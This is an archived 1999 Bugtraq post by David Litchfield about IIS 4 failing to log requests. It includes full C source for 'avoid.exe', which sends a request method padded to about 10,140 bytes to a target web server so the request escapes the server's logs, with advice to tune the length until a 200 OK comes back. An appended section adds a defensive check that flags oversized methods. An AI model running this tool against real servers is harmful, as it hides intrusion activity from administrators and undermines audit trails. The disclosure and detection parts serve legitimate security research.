Bugtraq mailing list archives
Follow up - IIS 4 logging
From: mnemonix () GLOBALNET CO UK (mnemonix)
Date: Sat, 23 Jan 1999 15:52:02 -0000
There has been a mixed response to this problem - on some machines nothing is logged and the page is returned, others get a 500 error and others log the whole request.
From what I can make out:
Machines that first had IIS 3 then were upgraded to IIS 4 with the NT Option Pack and Service Pack 3 or 4 return the page and don't log.

Here is the source for avoid.exe as many have asked for it - for those that get a 500 response back from the server play around with the request_method length by increasing it until you get a 200 OK response. It will chop and change between 5xx, 4xx and 200 responses.

Cheers,
David Litchfield
http://www.infowar.co.uk/mnemonix

-----------------------8<-----------------------------------------------
/* Compile with eg Visual C++ and link with wsock32.lib */
#include <stdio.h>
#include <winsock2.h>
#include <string.h>

int main (int argc, char *argv[])
{
    int snd, rcv, err, portno, a=0, b, res;
    char resp[1024];
    /* Request line tail; its length is taken with strlen() so send() never reads past the literal */
    const char *tail = " /default.asp HTTP/1.0\n\n";
    WORD wVersionRequested;
    WSADATA wsaData;
    struct sockaddr_in sa;
    struct hostent *he;
    SOCKET sock;

    if (argc != 2)
    {
        printf("Usage:\nc:\\>%s target_machine\n\nDavid Litchfield\n21st January 1999\n", argv[0]);
        return 0;
    }

    wVersionRequested = MAKEWORD( 2, 0 );
    err = WSAStartup( wVersionRequested, &wsaData );
    if ( err != 0 )
    {
        printf("No winsock.dll\n");
        return 0;
    }
    if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 0 )
    {
        printf("No winsock.dll - 2nd\n");
        WSACleanup( );
        return 0;
    }

    if ((he = gethostbyname(argv[1])) == NULL)
    {
        printf("Invalid Host\n");
        return 0;
    }

    sock=socket(AF_INET,SOCK_STREAM,0);
    if (sock==INVALID_SOCKET)
    {
        printf("Invalid Socket!\n");
        return 0;
    }
    else
    {
        printf("");
    }

    sa.sin_addr.s_addr=INADDR_ANY;
    sa.sin_family=AF_INET;
    bind(sock,(struct sockaddr *)&sa,sizeof(sa));
    sa.sin_port=htons(80);
    memcpy(&sa.sin_addr,he->h_addr,he->h_length);

    if(connect(sock,(struct sockaddr *)&sa,sizeof(sa)) < 0)
    {
        printf("Failed to connect!\n");
    }
    else
    {
        /* This loop creates the REQUEST_METHOD and makes it 10140 bytes long */
        while (a < 10141)
        {
            snd=send(sock,"A", 1, 0);
            a ++;
        }
        snd=send(sock,tail,(int)strlen(tail),0);

        /* NUL-terminate whatever was received before printing it */
        rcv=recv(sock,resp,256,0);
        if (rcv > 0)
        {
            resp[rcv]='\0';
            printf("\n%s",resp);
        }
        rcv=recv(sock,resp,sizeof(resp)-1,0);
        if (rcv > 0)
        {
            resp[rcv]='\0';
            printf("\n%s\n\n",resp);
        }
    }
    closesocket(sock);
    return 0;
}
----------------------------->8---------------------------------------------
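A check a front-end proxy or sensor could run on the raw request to catch the oversized request method described above, whether or not IIS logs it. This is an added example, not part of the original message; MAX_METHOD_LEN, the method allowlist and all function names are assumptions, and the sample request is constructed.

```c
#include <stdio.h>
#include <string.h>

#define MAX_METHOD_LEN 16   /* assumed policy limit, not a value from the post */
enum method_verdict { METHOD_OK, METHOD_UNKNOWN, METHOD_OVERSIZED, METHOD_MALFORMED };

/* Length of the method token: bytes before the first space, CR or LF.
 * buf need not be NUL-terminated; len is the number of captured bytes. */
size_t method_token_len(const char *buf, size_t len)
{
    size_t i = 0;
    while (i < len && buf[i] != ' ' && buf[i] != '\r' && buf[i] != '\n')
        i++;
    return i;
}

/* Classify the request method of a raw HTTP request as seen on the wire. */
enum method_verdict check_request_method(const char *buf, size_t len)
{
    static const char *const known[] = { "GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS", "TRACE" };
    size_t n = method_token_len(buf, len), k;
    if (n > MAX_METHOD_LEN)
        return METHOD_OVERSIZED;          /* flagged even if the capture is truncated */
    if (n == 0 || n == len || buf[n] != ' ')
        return METHOD_MALFORMED;          /* no "METHOD SP" prefix */
    for (k = 0; k < sizeof(known) / sizeof(known[0]); k++)
        if (strlen(known[k]) == n && memcmp(buf, known[k], n) == 0)
            return METHOD_OK;
    return METHOD_UNKNOWN;
}

/* Constructed sample: pad bytes of 'A', then the request tail quoted in the post. */
char sample[16384];
size_t build_padded_sample(size_t pad)
{
    static const char tail[] = " /default.asp HTTP/1.0\n\n";
    if (pad > sizeof(sample) - sizeof(tail))
        pad = sizeof(sample) - sizeof(tail);
    memset(sample, 'A', pad);
    memcpy(sample + pad, tail, sizeof(tail));   /* copies the NUL as well */
    return pad + sizeof(tail) - 1;              /* bytes "on the wire" */
}

int main(void)
{
    size_t len = build_padded_sample(10141);    /* byte count the posted loop sends */
    printf("method length %lu, verdict %d\n", (unsigned long)method_token_len(sample, len), check_request_method(sample, len));
    return 0;
}
```

Recording the verdict and method length in a log that does not depend on the web server gives a record to compare against the IIS log when a request goes missing there.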